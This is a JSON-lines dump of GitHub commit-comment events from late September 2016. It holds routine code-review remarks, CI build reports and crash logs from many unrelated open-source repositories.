{"id":"4638398464","type":"CommitCommentEvent","actor":{"login":"LebedevRI"},"repo":{"name":"darktable-org/darktable"},"payload":{"comment":{"id":19226886,"position":38,"line":279,"path":"src/libs/print_settings.c","commit_id":"c0f84c27c475fdfbfde606f498a2f3cb83758be4","created_at":"2016-09-29T16:29:19Z","updated_at":"2016-09-29T16:29:19Z","body":"Wait, what?\r\nHow does that work?\r\n`dt_colorspaces_get_profile()` returns `dt_colorspaces_color_profile_t`\r\nBut `dt_apply_printer_profile()` takes `cmsHPROFILE`"}},"created_at":"2016-09-29T16:29:19Z"}
{"id":"4638409654","type":"CommitCommentEvent","actor":{"login":"fabricioflores"},"repo":{"name":"noggalito/porttare-backend"},"payload":{"comment":{"id":19226905,"position":15,"line":15,"path":"app/models/provider_dispatcher.rb","commit_id":"b443af75ba0f91f19088bee17565088b638d96a0","created_at":"2016-09-29T16:31:13Z","updated_at":"2016-09-29T16:31:13Z","body":"es la relación q tiene con el usuario, por el correo electrónico"}},"created_at":"2016-09-29T16:31:13Z"}
{"id":"4638409673","type":"CommitCommentEvent","actor":{"login":"fabricioflores"},"repo":{"name":"noggalito/porttare-backend"},"payload":{"comment":{"id":19226906,"position":15,"line":15,"path":"app/models/provider_dispatcher.rb","commit_id":"b443af75ba0f91f19088bee17565088b638d96a0","created_at":"2016-09-29T16:31:13Z","updated_at":"2016-09-29T16:31:13Z","body":"es la relación q tiene con el usuario, por el correo electrónico"}},"created_at":"2016-09-29T16:31:13Z"}
{"id":"4638409694","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19226907,"position":null,"line":null,"path":null,"commit_id":"8347c0bc91edaada78500f2787e057a7f69256dd","created_at":"2016-09-29T16:31:14Z","updated_at":"2016-09-29T16:31:14Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1216](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14634&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-29T16:31:14Z"}
{"id":"4638410112","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19226908,"position":null,"line":null,"path":null,"commit_id":"8d4d1bc58e121d1ff44d87a2b90a497787e070c2","created_at":"2016-09-29T16:31:17Z","updated_at":"2016-09-29T16:31:17Z","body":"\nBuild report #163769526 for sha 8d4d1bc58e121d1ff44d87a2b90a497787e070c2:\n\n[![UnitTests](https://img.shields.io/badge/unittests-failed%20%281/7%29%20-red.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-19.38%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-3753%20/%2010048%20%2837.35%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-36.81%20%25-yellow.svg)](#)\n\n\n[Reports](https://psycofdj.github.io/xtdcpp/more_documentation/)\n      "}},"created_at":"2016-09-29T16:31:17Z"}
{"id":"4638410681","type":"CommitCommentEvent","actor":{"login":"ashmaroli"},"repo":{"name":"jekyll/jekyll"},"payload":{"comment":{"id":19226909,"position":null,"line":null,"path":null,"commit_id":"51695b2165c12bfe8acf1fd1f0b22904a0980e88","created_at":"2016-09-29T16:31:23Z","updated_at":"2016-09-29T16:31:23Z","body":"**`Travis is entirely broken`**? Why that commit msg?"}},"created_at":"2016-09-29T16:31:23Z"}
{"id":"4638411579","type":"CommitCommentEvent","actor":{"login":"kiliemanjaro"},"repo":{"name":"kiliemanjaro/miniature-telegram"},"payload":{"comment":{"id":19226912,"position":null,"line":null,"path":null,"commit_id":"13116cc6c41597463274dd643d874db0e6ff81f7","created_at":"2016-09-29T16:31:33Z","updated_at":"2016-09-29T16:31:33Z","body":"https://github.com/kiliemanjaro/miniature-telegram/commit/13116cc6c41597463274dd643d874db0e6ff81f7#"}},"created_at":"2016-09-29T16:31:33Z"}
{"id":"4638412573","type":"CommitCommentEvent","actor":{"login":"bcambl"},"repo":{"name":"pi-hole/pi-hole"},"payload":{"comment":{"id":19226916,"position":null,"line":null,"path":null,"commit_id":"cd30a7533efb01f180ae96e3b3833c04ac94b852","created_at":"2016-09-29T16:31:43Z","updated_at":"2016-09-29T16:31:43Z","body":"php-pdo\r\n"}},"created_at":"2016-09-29T16:31:43Z"}
{"id":"4638415419","type":"CommitCommentEvent","actor":{"login":"jcass77"},"repo":{"name":"kraqh3d/mopidy-pandora"},"payload":{"comment":{"id":19226919,"position":5,"line":215,"path":"mopidy_pandora/library.py","commit_id":"8d6bee78d191b5c4e32a36eeda5b050b06113df6","created_at":"2016-09-29T16:32:16Z","updated_at":"2016-09-29T16:32:16Z","body":"I suppose it was only a matter of time..."}},"created_at":"2016-09-29T16:32:16Z"}
{"id":"4638415442","type":"CommitCommentEvent","actor":{"login":"Nukem9"},"repo":{"name":"x64dbg/docs"},"payload":{"comment":{"id":19226920,"position":null,"line":null,"path":null,"commit_id":"10d2874b51319330b218eb9930da22a9e309bc6d","created_at":"2016-09-29T16:32:16Z","updated_at":"2016-09-29T16:32:16Z","body":"That is a really flawed design if you ask me. Why does strlen not follow this rule?"}},"created_at":"2016-09-29T16:32:16Z"}
{"id":"4638417273","type":"CommitCommentEvent","actor":{"login":"overRiver"},"repo":{"name":"overCountry/YiiShop"},"payload":{"comment":{"id":19226924,"position":null,"line":null,"path":null,"commit_id":"0576383d176782a2587084d34fae7865499329a0","created_at":"2016-09-29T16:32:35Z","updated_at":"2016-09-29T16:32:35Z","body":" 827,331 ++ / 347 --"}},"created_at":"2016-09-29T16:32:35Z"}
{"id":"4638417842","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/porttare-backend"},"payload":{"comment":{"id":19226926,"position":15,"line":15,"path":"app/models/provider_dispatcher.rb","commit_id":"b443af75ba0f91f19088bee17565088b638d96a0","created_at":"2016-09-29T16:32:41Z","updated_at":"2016-09-29T16:32:41Z","body":"sí, cierto, luego entendí.. a esta dejémosla para luego"}},"created_at":"2016-09-29T16:32:41Z"}
{"id":"4638419396","type":"CommitCommentEvent","actor":{"login":"kiliemanjaro"},"repo":{"name":"kiliemanjaro/miniature-telegram"},"payload":{"comment":{"id":19226930,"position":null,"line":null,"path":null,"commit_id":"13116cc6c41597463274dd643d874db0e6ff81f7","created_at":"2016-09-29T16:32:57Z","updated_at":"2016-09-29T16:32:57Z","body":"https://github.com/kiliemanjaro/miniature-telegram/commit/13116cc6c41597463274dd643d874db0e6ff81f7#commitcomment-19226912"}},"created_at":"2016-09-29T16:32:57Z"}
{"id":"4638419612","type":"CommitCommentEvent","actor":{"login":"andytimes"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19226931,"position":null,"line":null,"path":null,"commit_id":"a3548e8959ba02bc66e4aa81e4708da7b425f4aa","created_at":"2016-09-29T16:32:58Z","updated_at":"2016-09-29T16:32:58Z","body":"应该不完全是防 spam，每个人的邮箱地址类似于自己手机号，毕竟这是个人信息嘛。 关于在项目打 patch，如果别人提供了 patch，可以直接 git am [patch]。用 --author=xxxx 代替别人提交挺麻烦还容易错，只在特殊情况用一下就好。 Linux 内核收 patch 时，有一套很完善的流程，感兴趣可以去了解下。在生成符合规定的 linux-kernel 邮件补丁这第一步，就能成功阻挡一大批无意义的垃圾提交，相比 Github 一言不合就 Pull Requests 要好很多。 好吧，扯远了，睡觉、、、 Andy 在2016年09月29日 23:14 ，SCaffrey写道： 防spam吗 少侠blog里面@换成了# 之前我都是到处找别人的email来commit with 没有意识到这样的习惯QAQ — You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub, or mute the thread."}},"created_at":"2016-09-29T16:32:58Z"}
{"id":"4638421018","type":"CommitCommentEvent","actor":{"login":"akscram"},"repo":{"name":"MirantisLabs/upgrade-ci"},"payload":{"comment":{"id":19226943,"position":26,"line":42,"path":"docker/jenkins.sh","commit_id":"bd80063c3f960ea66f5020fcf0eb6f0c5650d570","created_at":"2016-09-29T16:33:14Z","updated_at":"2016-09-29T16:33:14Z","body":"You can replace it by the next code:\r\n\r\n```\r\nexec \"$@\" &\r\njenkins_pid=$!\r\n...\r\nwait \"$jenkins_pid\"\r\n```"}},"created_at":"2016-09-29T16:33:14Z"}
{"id":"4638421890","type":"CommitCommentEvent","actor":{"login":"slarson"},"repo":{"name":"openworm/org.geppetto.frontend"},"payload":{"comment":{"id":19226945,"position":7,"line":217,"path":"src/main/webapp/js/tests/casperjs/geppetto-tests.js","commit_id":"a8bae8571e3d5351dd9801b75c43d503c32c94b0","created_at":"2016-09-29T16:33:24Z","updated_at":"2016-09-29T16:33:24Z","body":"Clarifying: the docs are telling us that if we are not already using jquery in our front end, we can use it by injecting it.  That's a bit different than saying we must inject jQuery if we want to use the one that is already being loaded in the frontend.  Probably better to use the one that is there already because we may run into version mismatches.   Check out this mechanism for evaluating stuff in the context of the page: http://docs.casperjs.org/en/latest/modules/casper.html#evaluate"}},"created_at":"2016-09-29T16:33:24Z"}
{"id":"4638425921","type":"CommitCommentEvent","actor":{"login":"henriquementz"},"repo":{"name":"henriquementz/crescer-2016-2"},"payload":{"comment":{"id":19226964,"position":4,"line":13,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"fee3a742f811ce1ff8682f379b447fa941fee31b","created_at":"2016-09-29T16:34:07Z","updated_at":"2016-09-29T16:34:07Z","body":"Corrigido! "}},"created_at":"2016-09-29T16:34:07Z"}
{"id":"4638428121","type":"CommitCommentEvent","actor":{"login":"misha1"},"repo":{"name":"NL-4-DEVS/PocketRPG"},"payload":{"comment":{"id":19226971,"position":null,"line":null,"path":null,"commit_id":"36e89ab2e94cf398f23dfc5a77f243cc12bfbabe","created_at":"2016-09-29T16:34:29Z","updated_at":"2016-09-29T16:34:29Z","body":"\r\nError: Can't use method return value in write context\r\nFile: /plugins/PocketRPG-Stable/src/PocketRPG/Main\r\nLine: 72\r\nType: E_COMPILE_ERROR\r\n\r\nTHIS CRASH WAS CAUSED BY A PLUGIN\r\n\r\nCode:\r\n[63]   }\r\n[64]   \r\n[65]   public function getClass(Player $p) {\r\n[66]     $class = $this->playerclass->get($p->getName());\r\n[67]     return $class;\r\n[68]   }\r\n[69]   \r\n[70]   public function unsetClass(Player $p){\r\n[71]     $this->playerclass->set($p->getName(). \".class\", false);\r\n[72]     unset($this->playerclass->get($p->getName()));\r\n[73]     $this->playerclass->save();\r\n[74]   }\r\n[75] \r\n[76]   public function hasQuestFinished(Player $p, $quest) {\r\n[77]     $this->quest = new Config($this->getDataFolder() . \"quests/\" . $quest . \".yml\");\r\n[78]     if($this->quest->get(\"Finished\", $p->getName()) != NULL) {\r\n[79]       return true;\r\n[80]     }\r\n[81]   }\r\n[82] "}},"created_at":"2016-09-29T16:34:29Z"}
{"id":"4638428251","type":"CommitCommentEvent","actor":{"login":"volodden"},"repo":{"name":"volodden/YaPyN_Editor"},"payload":{"comment":{"id":19226972,"position":15,"line":24,"path":"README.md","commit_id":"d194c492f65fbadd8c02114333cf319dc3a82123","created_at":"2016-09-29T16:34:30Z","updated_at":"2016-09-29T16:34:30Z","body":"Добавил."}},"created_at":"2016-09-29T16:34:30Z"}
{"id":"4638429534","type":"CommitCommentEvent","actor":{"login":"joshuaruesweg"},"repo":{"name":"wbbaddons/nodePush"},"payload":{"comment":{"id":19226977,"position":14,"line":9,"path":"templateListener.xml","commit_id":"bebbdcab14ef9f0ff250f2201249c686225ac91f","created_at":"2016-09-29T16:34:44Z","updated_at":"2016-09-29T16:34:44Z","body":"empty script tags"}},"created_at":"2016-09-29T16:34:44Z"}
{"id":"4638429861","type":"CommitCommentEvent","actor":{"login":"kiliemanjaro"},"repo":{"name":"kiliemanjaro/miniature-telegram"},"payload":{"comment":{"id":19226978,"position":null,"line":null,"path":null,"commit_id":"13116cc6c41597463274dd643d874db0e6ff81f7","created_at":"2016-09-29T16:34:47Z","updated_at":"2016-09-29T16:34:47Z","body":"https://avatars3.githubusercontent.com/u/22519131?v=3&s=220"}},"created_at":"2016-09-29T16:34:47Z"}
{"id":"4638435482","type":"CommitCommentEvent","actor":{"login":"AnacondaPython"},"repo":{"name":"tangycode/tangycode.github.io"},"payload":{"comment":{"id":19226993,"position":null,"line":null,"path":null,"commit_id":"fadb414d5d1980ced31de8d9ce87c7008f2bada0","created_at":"2016-09-29T16:35:45Z","updated_at":"2016-09-29T16:35:45Z","body":"gives me this weird leia mas thing\r\n\r\n![](![](http://i.imgur.com/LQJd10B.png))"}},"created_at":"2016-09-29T16:35:45Z"}
{"id":"4638436189","type":"CommitCommentEvent","actor":{"login":"msuchard"},"repo":{"name":"OHDSI/PatientLevelPrediction"},"payload":{"comment":{"id":19226997,"position":null,"line":null,"path":null,"commit_id":"f386242d49aea96f3b4c06e27e6826dbc120cb32","created_at":"2016-09-29T16:35:53Z","updated_at":"2016-09-29T16:35:53Z","body":"This is an odd issue.  The error report suggests `Cyclops`:\r\n\r\n```\r\n# JRE version: 6.0_34-b34\r\n# Java VM: OpenJDK 64-Bit Server VM (23.25-b01 mixed mode linux-amd64 compressed oops)\r\n# Derivative: IcedTea6 1.13.6\r\n# Distribution: Ubuntu 12.04 LTS, package 6b34-1.13.6-1ubuntu0.12.04.1\r\n# Problematic frame:\r\n# C  [Cyclops.so+0x6c0bc]  bsccs::AbstractCrossValidationDriver::doCrossValidationStep(bsccs::CyclicCoordinateDescent&, bsccs::AbstractSelector&, bsccs::CCDArguments const&, int, int, std::vector<bsccs::CyclicCoordinateDescent*, std::allocator<bsccs::CyclicCoordinateDescent*> >&, std::vector<bsccs::AbstractSelector*, std::allocator<bsccs::AbstractSelector*> >&, std::vector<double, std::allocator<double> >&)+0xbc\r\n```\r\n\r\nIs `Java` calling `Cyclops`?  @schuemie @jreps \r\n"}},"created_at":"2016-09-29T16:35:53Z"}
{"id":"4638438011","type":"CommitCommentEvent","actor":{"login":"Keital"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19227001,"position":null,"line":null,"path":null,"commit_id":"8f9a5e14120f422919e75ea1d25e127301533de2","created_at":"2016-09-29T16:36:12Z","updated_at":"2016-09-29T16:36:12Z","body":"Thanks Guys"}},"created_at":"2016-09-29T16:36:12Z"}
{"id":"4638439224","type":"CommitCommentEvent","actor":{"login":"mrexodia"},"repo":{"name":"x64dbg/docs"},"payload":{"comment":{"id":19227004,"position":null,"line":null,"path":null,"commit_id":"10d2874b51319330b218eb9930da22a9e309bc6d","created_at":"2016-09-29T16:36:24Z","updated_at":"2016-09-29T16:36:24Z","body":"Strlen will be deleted\nOn Thu, 29 Sep 2016 at 18:34, Nukem <notifications@github.com> wrote:\n\n> That is a really flawed design if you ask me. Why does strlen not follow\n> this rule?\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/x64dbg/docs/commit/10d2874b51319330b218eb9930da22a9e309bc6d#commitcomment-19226920>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACWCmXQ4ZiX_ZCf3Ua83_rV55UeRHG-uks5qu-gRgaJpZM4KKLF9>\n> .\n>\n"}},"created_at":"2016-09-29T16:36:24Z"}
{"id":"4638439762","type":"CommitCommentEvent","actor":{"login":"lukaszdabrowskicom"},"repo":{"name":"lukaszdabrowskicom/UrlFragmentIdentifierCleaner"},"payload":{"comment":{"id":19227006,"position":null,"line":null,"path":null,"commit_id":"c00f339df513d3294666a2d8243cced6479d91c8","created_at":"2016-09-29T16:36:30Z","updated_at":"2016-09-29T16:36:30Z","body":"moved"}},"created_at":"2016-09-29T16:36:30Z"}
{"id":"4638439800","type":"CommitCommentEvent","actor":{"login":"alxndrsn"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19227007,"position":17,"line":213,"path":"templates/partials/contacts_content.html","commit_id":"eccaae2055f094778b7e3be68776b6bb1ba1c16a","created_at":"2016-09-29T16:36:30Z","updated_at":"2016-09-29T16:36:30Z","body":"👍  I think that's an improvement"}},"created_at":"2016-09-29T16:36:30Z"}
{"id":"4638439891","type":"CommitCommentEvent","actor":{"login":"mat-mr"},"repo":{"name":"mat-mr/crescer-2016-2"},"payload":{"comment":{"id":19227008,"position":13,"line":38,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"8bfce866dd451a34757e9f867d3af8ebfe1ddcbf","created_at":"2016-09-29T16:36:31Z","updated_at":"2016-09-29T16:36:31Z","body":"Corrigido. Peço que verifique o restante do código, pois eu não havia acabado quando conferiu."}},"created_at":"2016-09-29T16:36:31Z"}
{"id":"4638440812","type":"CommitCommentEvent","actor":{"login":"henriquementz"},"repo":{"name":"henriquementz/crescer-2016-2"},"payload":{"comment":{"id":19227011,"position":4,"line":13,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"fee3a742f811ce1ff8682f379b447fa941fee31b","created_at":"2016-09-29T16:36:40Z","updated_at":"2016-09-29T16:36:40Z","body":"Corrigido!"}},"created_at":"2016-09-29T16:36:40Z"}
{"id":"4638443081","type":"CommitCommentEvent","actor":{"login":"henriquementz"},"repo":{"name":"henriquementz/crescer-2016-2"},"payload":{"comment":{"id":19227018,"position":16,"line":26,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"fee3a742f811ce1ff8682f379b447fa941fee31b","created_at":"2016-09-29T16:37:02Z","updated_at":"2016-09-29T16:37:02Z","body":"Corrigido!"}},"created_at":"2016-09-29T16:37:02Z"}
{"id":"4638443090","type":"CommitCommentEvent","actor":{"login":"overRiver"},"repo":{"name":"overCountry/YiiShop"},"payload":{"comment":{"id":19227019,"position":null,"line":null,"path":null,"commit_id":"ff23010689af4ae4eba100bb6a03aa42afb8bbbc","created_at":"2016-09-29T16:37:02Z","updated_at":"2016-09-29T16:37:02Z","body":"827,415 ++ / 410 --"}},"created_at":"2016-09-29T16:37:02Z"}
{"id":"4638444398","type":"CommitCommentEvent","actor":{"login":"akscram"},"repo":{"name":"MirantisLabs/upgrade-ci"},"payload":{"comment":{"id":19227025,"position":15,"line":31,"path":"docker/jenkins.sh","commit_id":"bd80063c3f960ea66f5020fcf0eb6f0c5650d570","created_at":"2016-09-29T16:37:16Z","updated_at":"2016-09-29T16:37:16Z","body":"`jenkins.sh` is used as an entry point and it means that it will be executed on each run."}},"created_at":"2016-09-29T16:37:16Z"}
{"id":"4638444847","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19227027,"position":null,"line":null,"path":null,"commit_id":"4f3fde42d054b1ddc1acf9b5260c6ec19ce71fcb","created_at":"2016-09-29T16:37:21Z","updated_at":"2016-09-29T16:37:21Z","body":"The menu-entry 'Common interface' should only be visible when a CAM has actually been inserted."}},"created_at":"2016-09-29T16:37:21Z"}
{"id":"4638445185","type":"CommitCommentEvent","actor":{"login":"alxndrsn"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19227028,"position":62,"line":221,"path":"static/js/controllers/contacts-content.js","commit_id":"a19b9b1aa01aae6768d64113dd31ef4b0e161224","created_at":"2016-09-29T16:37:25Z","updated_at":"2016-09-29T16:37:25Z","body":"After I'd read the code properly, `children.persons` started to make a bit more sense... I guess `children.people` sounds bizarre for exactly the same reason anyway, so not much point changing."}},"created_at":"2016-09-29T16:37:25Z"}
{"id":"4638445272","type":"CommitCommentEvent","actor":{"login":"Cubemaster7"},"repo":{"name":"Cubemaster7/OrbicTextAdventure"},"payload":{"comment":{"id":19227029,"position":null,"line":null,"path":null,"commit_id":"f649d7de6dbddc7beb045da9daef39bfc3221561","created_at":"2016-09-29T16:37:26Z","updated_at":"2016-09-29T16:37:26Z","body":"I disagree with these changes, I think it's much clearer to the player if we just state the punctuation involved. Plus, the use of the phrase \"full stop\"."}},"created_at":"2016-09-29T16:37:26Z"}
{"id":"4638445715","type":"CommitCommentEvent","actor":{"login":"jrmartin"},"repo":{"name":"openworm/org.geppetto.frontend"},"payload":{"comment":{"id":19227030,"position":7,"line":217,"path":"src/main/webapp/js/tests/casperjs/geppetto-tests.js","commit_id":"a8bae8571e3d5351dd9801b75c43d503c32c94b0","created_at":"2016-09-29T16:37:31Z","updated_at":"2016-09-29T16:37:31Z","body":"@gidili I tried several times to get jquery calls working before the inject and it complained about the lack of jquery library, then added the inject and it worked. Weird, will try without the inject"}},"created_at":"2016-09-29T16:37:31Z"}
{"id":"4638447125","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19227034,"position":null,"line":null,"path":null,"commit_id":"efc13a2ad7f190c14665f55d4a696215f86f72bb","created_at":"2016-09-29T16:37:46Z","updated_at":"2016-09-29T16:37:46Z","body":"Tomorrow !!\r\n\r\nANd io receive some email :grin: "}},"created_at":"2016-09-29T16:37:46Z"}
{"id":"4638455791","type":"CommitCommentEvent","actor":{"login":"OtavioBubans"},"repo":{"name":"OtavioBubans/crescer-2016-2"},"payload":{"comment":{"id":19227053,"position":2,"line":2,"path":"src/modulo-01-java-OO/modulo-01/Dwarves.java","commit_id":"00e8e53f350d8623c157fab7002f2d78aea32647","created_at":"2016-09-29T16:39:16Z","updated_at":"2016-09-29T16:39:16Z","body":"ok. melhor arrumar ou deixar assim como está?"}},"created_at":"2016-09-29T16:39:16Z"}
{"id":"4638456340","type":"CommitCommentEvent","actor":{"login":"FeatureIDE"},"repo":{"name":"FeatureIDE/FeatureIDE"},"payload":{"comment":{"id":19227054,"position":null,"line":null,"path":null,"commit_id":"42f862425c36e1c97db42f86d866da996c540022","created_at":"2016-09-29T16:39:21Z","updated_at":"2016-09-29T16:39:21Z","body":"Please only comments in English"}},"created_at":"2016-09-29T16:39:21Z"}
{"id":"4638458530","type":"CommitCommentEvent","actor":{"login":"nficca"},"repo":{"name":"nficca/endless-td"},"payload":{"comment":{"id":19227063,"position":7,"line":67,"path":"Assets/Scripts/Controllers/Tower/TowerController.cs","commit_id":"7732f9c57bffe97ba9502ea0d75eaa6d593eb685","created_at":"2016-09-29T16:39:43Z","updated_at":"2016-09-29T16:39:43Z","body":"Should be `Mathf.Min(...)`"}},"created_at":"2016-09-29T16:39:43Z"}
{"id":"4638460017","type":"CommitCommentEvent","actor":{"login":"schuemie"},"repo":{"name":"OHDSI/PatientLevelPrediction"},"payload":{"comment":{"id":19227069,"position":null,"line":null,"path":null,"commit_id":"f386242d49aea96f3b4c06e27e6826dbc120cb32","created_at":"2016-09-29T16:40:00Z","updated_at":"2016-09-29T16:40:00Z","body":"Java is not calling Cyclops. The error does not occur on my hardware (Win7, Oracle Java)."}},"created_at":"2016-09-29T16:40:00Z"}
{"id":"4638460889","type":"CommitCommentEvent","actor":{"login":"SakkariNaresh"},"repo":{"name":"fcc-hyd/projects"},"payload":{"comment":{"id":19227072,"position":null,"line":null,"path":null,"commit_id":"fbb0b044730c2118cff5f6d1ef742537adf2769a","created_at":"2016-09-29T16:40:10Z","updated_at":"2016-09-29T16:40:10Z","body":"Yes, your correct. \r\nplease provide steps to build the project and what type of environment is need to  start this project.\r\n\r\nThanks in advance. 👍 "}},"created_at":"2016-09-29T16:40:10Z"}
{"id":"4638463292","type":"CommitCommentEvent","actor":{"login":"tthuem"},"repo":{"name":"FeatureIDE/FeatureIDE"},"payload":{"comment":{"id":19227078,"position":null,"line":null,"path":null,"commit_id":"3f4ff044912195bc75e9662278723a3881f5ff6d","created_at":"2016-09-29T16:40:33Z","updated_at":"2016-09-29T16:40:33Z","body":"Please only comments in English (seen German in code reviews)"}},"created_at":"2016-09-29T16:40:33Z"}
{"id":"4638464702","type":"CommitCommentEvent","actor":{"login":"lydell"},"repo":{"name":"postcss/postcss"},"payload":{"comment":{"id":19227080,"position":null,"line":null,"path":null,"commit_id":"fcce3bd658fe22674787ef5d6175922ebb5424b2","created_at":"2016-09-29T16:40:48Z","updated_at":"2016-09-29T16:40:48Z","body":"1. Sorry. I was not clear enough. Hope this screen shot clarify things:\r\n\r\n   ![screenshot from 2016-09-29 18-35-56](https://cloud.githubusercontent.com/assets/2142817/18963061/9b89941e-8673-11e6-9537-9646da57b9cc.png)\r\n\r\n   `32px` is a _valid_ token, so it shouldn't be marked as something invalid :)\r\n\r\n2. Sorry, I meant _only_ bold. `chalk.bold` for punctuation (with default/white color) looks bad on Ubuntu. `chalk.red.bold` looks fine though :)\r\n\r\n3. Ok!\r\n\r\n4. Ok!\r\n\r\n5. My thinking is to do a \"best-effort\" thing: `.` before a name? → probably class name. `:` after name? → probably property name. I'll see what I come up with :)\r\n\r\nOk, I'll make a PR!"}},"created_at":"2016-09-29T16:40:48Z"}
{"id":"4638470423","type":"CommitCommentEvent","actor":{"login":"metacoma"},"repo":{"name":"MirantisLabs/upgrade-ci"},"payload":{"comment":{"id":19227094,"position":26,"line":42,"path":"docker/jenkins.sh","commit_id":"bd80063c3f960ea66f5020fcf0eb6f0c5650d570","created_at":"2016-09-29T16:41:48Z","updated_at":"2016-09-29T16:41:48Z","body":"Yep, correct, i wanted to do well"}},"created_at":"2016-09-29T16:41:48Z"}
{"id":"4638471101","type":"CommitCommentEvent","actor":{"login":"tthuem"},"repo":{"name":"FeatureIDE/FeatureIDE"},"payload":{"comment":{"id":19227095,"position":null,"line":null,"path":null,"commit_id":"185070c08a3867dcaffab99486c52e001e8cdf51","created_at":"2016-09-29T16:41:56Z","updated_at":"2016-09-29T16:41:56Z","body":"Please only comments in English (seen German in code reviews)"}},"created_at":"2016-09-29T16:41:56Z"}
{"id":"4638471780","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19227097,"position":null,"line":null,"path":null,"commit_id":"8347c0bc91edaada78500f2787e057a7f69256dd","created_at":"2016-09-29T16:42:03Z","updated_at":"2016-09-29T16:42:03Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1216](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14634&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 259, ignored: 3 Build time: 00:10:49"}},"created_at":"2016-09-29T16:42:03Z"}
{"id":"4638475000","type":"CommitCommentEvent","actor":{"login":"phdd"},"repo":{"name":"phdd/diplom"},"payload":{"comment":{"id":19227108,"position":33,"line":79,"path":"document.md","commit_id":"d6d4a9d63952b1a25060770d36bca413761dc2f5","created_at":"2016-09-29T16:42:35Z","updated_at":"2016-09-29T16:42:35Z","body":"@sebastiangoetz Sind Stichpunkte geeignet oder wäre hier Fließtext besser? "}},"created_at":"2016-09-29T16:42:35Z"}
{"id":"4638476198","type":"CommitCommentEvent","actor":{"login":"karlnapf"},"repo":{"name":"karlnapf/kernel_exp_family"},"payload":{"comment":{"id":19227115,"position":15,"line":104,"path":"kernel_exp_family/estimators/full/gaussian.py","commit_id":"5135d8cfa3c884f773f3fbd029738bf59f443f95","created_at":"2016-09-29T16:42:48Z","updated_at":"2016-09-29T16:42:48Z","body":"should be unit tested against the full hessian"}},"created_at":"2016-09-29T16:42:48Z"}
{"id":"4638476688","type":"CommitCommentEvent","actor":{"login":"metacoma"},"repo":{"name":"MirantisLabs/upgrade-ci"},"payload":{"comment":{"id":19227116,"position":15,"line":31,"path":"docker/jenkins.sh","commit_id":"bd80063c3f960ea66f5020fcf0eb6f0c5650d570","created_at":"2016-09-29T16:42:53Z","updated_at":"2016-09-29T16:42:53Z","body":"Yep, true, upgrade-ci.sh runs only if a jenkins has no preconfigured jobs, but anyway is not good solution for that"}},"created_at":"2016-09-29T16:42:53Z"}
{"id":"4638477544","type":"CommitCommentEvent","actor":{"login":"ai"},"repo":{"name":"postcss/postcss"},"payload":{"comment":{"id":19227121,"position":null,"line":null,"path":null,"commit_id":"fcce3bd658fe22674787ef5d6175922ebb5424b2","created_at":"2016-09-29T16:43:03Z","updated_at":"2016-09-29T16:43:03Z","body":"1. Anyway, let’s remove red background.\r\n2. Sure, let’t replace `chalk.bold` for any other color.\r\n\r\n5. If this simple `\\w+:` and `#\\w+` and `.\\w+` will works — let’s change it."}},"created_at":"2016-09-29T16:43:03Z"}
{"id":"4638477801","type":"CommitCommentEvent","actor":{"login":"tthuem"},"repo":{"name":"FeatureIDE/FeatureIDE"},"payload":{"comment":{"id":19227123,"position":null,"line":null,"path":null,"commit_id":"9a6088f53555eef0c6ee97a8714b98dba95d7062","created_at":"2016-09-29T16:43:06Z","updated_at":"2016-09-29T16:43:06Z","body":"Please only comments in English (seen German in code reviews)"}},"created_at":"2016-09-29T16:43:06Z"}
{"id":"4638481087","type":"CommitCommentEvent","actor":{"login":"Deuteu"},"repo":{"name":"romaincointepas/twitch-mini-player"},"payload":{"comment":{"id":19227133,"position":null,"line":null,"path":null,"commit_id":"b3db4338ecabee48d1f345db407c5cce2e485a0f","created_at":"2016-09-29T16:43:39Z","updated_at":"2016-09-29T16:43:39Z","body":"Hi,\r\nI have the 1.0.8 version but it seems the previous change in the coffee file wasn't taken by google.\r\n\r\n![image](https://cloud.githubusercontent.com/assets/7711220/18963278/9249f05a-8674-11e6-8a53-b02154f5ff9c.png)\r\n\r\nAnd thanks for your work btw, really great extension."}},"created_at":"2016-09-29T16:43:39Z"}
